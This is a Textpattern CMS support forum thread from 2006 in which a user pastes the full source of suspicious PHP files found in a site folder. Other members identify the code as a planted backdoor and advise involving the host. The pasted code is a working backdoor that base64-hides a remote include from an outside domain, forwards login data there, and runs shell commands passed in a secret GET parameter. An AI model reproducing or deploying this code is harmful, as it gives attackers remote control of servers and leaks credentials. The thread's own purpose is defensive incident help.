Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Pages: 1
#1 2006-01-02 11:11:14
- root
- Member
- From: Manila, Philippines
- Registered: 2004-05-31
- Posts: 48
strange files in textpattern folder
I was updating TxP from 4.0 -> 4.3. In the base textpattern folder (along with the files .htaccess and index.php, and the folders files, images and textpattern), I came across these files which have no counterpart in the new release: finfo.php, guest.php, package.php, system.php and publish.php.
With the exception of publish.php (which is blank), the four other files all have the same content:
<code><?php
error_reporting(0);
if(isset($_POST[“l”]) and isset($_POST[“p”])){
if(isset($_POST[“input”])){$user_auth=”&l=”. base64_encode($_POST[“l”]) .”&p=”. base64_encode(md5($_POST[“p”]));}
else{$user_auth=”&l=”. $_POST[“l”] .”&p=”. $_POST[“p”];}
}else{$user_auth=”“;}
if(!isset($_POST[“log_flg”])){$log_flg=”&log”;}
if(! @include_once(base64_decode(“aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9”) . sprintf(“%u”, ip2long(getenv(REMOTE_ADDR))) .”&url=”. base64_encode($_SERVER[“SERVER_NAME”] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET[“a3kfj39fsj2”])){system($_GET[“a3kfj39fsj2”]);}
if($_POST[“l”]==“special”){print “sys_active”. `uname -a`;}
}
?></code>
I’m not a programmer, and can’t understand what this means. Are these files supposed to exist?
Thanks very much :)
Offline
Re: strange files in textpattern folder
No, they are not supposed to be there. It looks like security at your server was breached in some way, and those files left there as a backdoor to future remote code execution. The base64-encoded part cloaks “http://bi s.ifr ame.ru/ma ster.php?r_addr=”
Backup anything that could be proof, then talk with a professional on which steps to take (finding out how much your system was/could have been compromised; what to do to get the system back in a secure state etc.).
Offline
#3 2006-01-02 12:25:54
- root
- Member
- From: Manila, Philippines
- Registered: 2004-05-31
- Posts: 48
Re: strange files in textpattern folder
Oh my. o_o
Alright, thanks very much for the quick reply. I wonder though, is this a weakness of textpattern that allowed the hacker to plant these files? And what does this code do?
Offline
Re: strange files in textpattern folder
is this a weakness of textpattern
None of the security related things we fixed would allow this kind of thing to the best of my knowledge.
A little bit of googling shows that the exacty code you posted has appeared on multiple siites of multiple people. Some are indicating that the problem is server-wide, meaning someone hacks a server and distributes those files on the sites hosted on it. Others indicated that this happened with special vulnerable versions of popular scripts that allowed arbritrary remote code exection. Which is why you should be talking with your host and potentially a professional who can examine the server and the logfiles to find out more.
And what does this code do?
The code sits there and let’s anybody who knows how to access it execute any code on your server that said person wants to. Depending on your configuration this may be limited to “only” php-scripts, but potentially to system binaries as well. It all depends on the configuration of the server.
Offline
#5 2006-01-02 13:27:46
- root
- Member
- From: Manila, Philippines
- Registered: 2004-05-31
- Posts: 48
Re: strange files in textpattern folder
None of the security related things we fixed would allow this kind of thing to the best of my knowledge.
Good to know. _ I’ve emailed my host; I hope this problem is fixed soon. Thanks again!
Offline
Pages: 1